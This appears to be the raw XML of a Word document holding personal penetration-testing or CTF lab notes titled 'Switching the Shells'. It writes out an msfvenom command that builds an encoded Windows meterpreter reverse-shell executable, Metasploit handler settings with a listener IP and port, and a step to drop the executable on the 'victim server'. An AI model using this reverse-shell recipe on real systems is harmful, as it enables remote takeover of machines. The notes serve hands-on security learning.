          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu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864BF71" wp14:editId="6DA6443C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>87630</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>237490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4191000" cy="2006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Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B535C" w14:textId="7F405AFC" w:rsidR="00DC2C15" w:rsidRDefault="00DC2C15" w:rsidP="00DC2C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EF7C0B" w14:textId="18768DA3" w:rsidR="00FE0DEF" w:rsidRPr="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17245F50" w14:textId="69694345" w:rsidR="00FE0DEF" w:rsidRPr="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0646ABA6" w14:textId="6033C343" w:rsidR="00FE0DEF" w:rsidRPr="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD6D7E0" w14:textId="192493DB" w:rsidR="00FE0DEF" w:rsidRPr="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B48E61E" w14:textId="26B0D129" w:rsidR="00FE0DEF" w:rsidRPr="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6854D793" w14:textId="19DF1FC3" w:rsidR="00FE0DEF" w:rsidRPr="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD22AE6" w14:textId="5CC46FBA" w:rsidR="00FE0DEF" w:rsidRPr="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FF18EB" w14:textId="336BF438" w:rsidR="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3830B362" w14:textId="062F5C91" w:rsidR="00FE0DEF" w:rsidRDefault="00FE0DEF" w:rsidP="00FE0DE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2: Switching the Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FEC9F7" w14:textId="009BDBC7" w:rsidR="00FE0DEF" w:rsidRDefault="00325183" w:rsidP="00FE0DE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B1. </w:t>
      </w:r>
      <w:r w:rsidR="0012040A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a </w:t>
      </w:r>
      <w:r w:rsidR="0012040A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows meterpreter shell using </w:t>
      </w:r>
      <w:r w:rsidR="0012040A" w:rsidRPr="00DE6EA3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407F050" w14:textId="7FF98CE6" w:rsidR="0012040A" w:rsidRPr="005D15D0" w:rsidRDefault="0012040A" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D15D0">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p </w:t>
      </w:r>
      <w:r w:rsidRPr="00026604">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="005D15D0">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [</w:t>
      </w:r>
      <w:r w:rsidRPr="00215885">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SHELL NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="005D15D0">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>].exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F84E421" w14:textId="2ED8E61E" w:rsidR="00FE0DEF" w:rsidRDefault="00325183" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">B2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Start Metasploit handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200CB2A" w14:textId="36348AE3" w:rsidR="00EF4026" w:rsidRDefault="00325183" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325183">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="00E257B2" w:rsidRPr="00E257B2">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10.18.27.67</w:t>
      </w:r>
      <w:r w:rsidR="00E257B2">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00325183">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT </w:t>
      </w:r>
      <w:r w:rsidR="00E257B2">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1111</w:t>
      </w:r>
      <w:r w:rsidRPr="00325183">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C0FFB5" w14:textId="30062E46" w:rsidR="00EF4026" w:rsidRDefault="00EF4026">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4026">
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="782A0A7E" wp14:editId="7FE18685">
            <wp:extent cx="5799323" cy="1089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d" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC1E9D5" w14:textId="4BE36AE9" w:rsidR="00325183" w:rsidRDefault="00EF4026" w:rsidP="00FE0DE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B3. Drop that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_shell.exe into the victim server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E894B20" w14:textId="77777777" w:rsidR="00EF4026" w:rsidRPr="00EF4026" w:rsidRDefault="00EF4026" w:rsidP="00FE0DEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3F7F94" w14:textId="40C5BD15" w:rsidR="00EF4026" w:rsidRPr="00EF4026" w:rsidRDefault="00EF4026" w:rsidP="00EF4026">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Rod" w:hAnsi="Rod" w:cs="Rod"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EF4026" w:rsidRPr="00EF4026" w:rsidSect="00476881">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440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d">
    <w:altName w:val="Rod"/>
    <w:charset w:val="B1"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000803" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000021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B2D79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69AA3348"/>
    <w:lvl w:ilvl="0" w:tplc="BAEA22F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484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36"/>
    <w:rsid w:val="00026604"/>
    <w:rsid w:val="000F1EE4"/>
    <w:rsid w:val="0012040A"/>
    <w:rsid w:val="00215885"/>
    <w:rsid w:val="0025009B"/>
    <w:rsid w:val="00253920"/>
    <w:rsid w:val="002D7B80"/>
    <w:rsid w:val="00325183"/>
    <w:rsid w:val="003877C6"/>
    <w:rsid w:val="003D232E"/>
    <w:rsid w:val="003D4803"/>
    <w:rsid w:val="00476881"/>
    <w:rsid w:val="004A44DD"/>
    <w:rsid w:val="004B701C"/>
    <w:rsid w:val="005354A7"/>
    <w:rsid w:val="00535783"/>
    <w:rsid w:val="005A0A59"/>
    <w:rsid w:val="005D15D0"/>
    <w:rsid w:val="005D2B71"/>
    <w:rsid w:val="005E0580"/>
    <w:rsid w:val="00634636"/>
    <w:rsid w:val="006B5895"/>
    <w:rsid w:val="006E1EAC"/>
    <w:rsid w:val="006E1ED3"/>
    <w:rsid w:val="0071561C"/>
    <w:rsid w:val="00757B3B"/>
    <w:rsid w:val="007D539D"/>
    <w:rsid w:val="00880C16"/>
    <w:rsid w:val="008A03FE"/>
    <w:rsid w:val="0092448F"/>
    <w:rsid w:val="00945AE3"/>
    <w:rsid w:val="00991862"/>
    <w:rsid w:val="00AA3E1B"/>
    <w:rsid w:val="00B1754E"/>
    <w:rsid w:val="00B47DB2"/>
    <w:rsid w:val="00B728F9"/>
    <w:rsid w:val="00BA581B"/>
    <w:rsid w:val="00C153E2"/>
    <w:rsid w:val="00CB04F2"/>
    <w:rsid w:val="00CD7393"/>
    <w:rsid w:val="00D13AF3"/>
    <w:rsid w:val="00DC2C15"/>
    <w:rsid w:val="00DE6EA3"/>
    <w:rsid w:val="00E02E4D"/>
    <w:rsid w:val="00E257B2"/>
    <w:rsid w:val="00EF4026"/>
    <w:rsid w:val="00F7029D"/>
    <w:rsid w:val="00FE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868D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AF2C69E2-F2A7-40C1-A448-919B82B7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8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1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ratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps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amratashok/nisha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Vu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Thiên Ân Vũ</cp:lastModifiedBy>
  <cp:revision>69</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-13T19:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T13:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>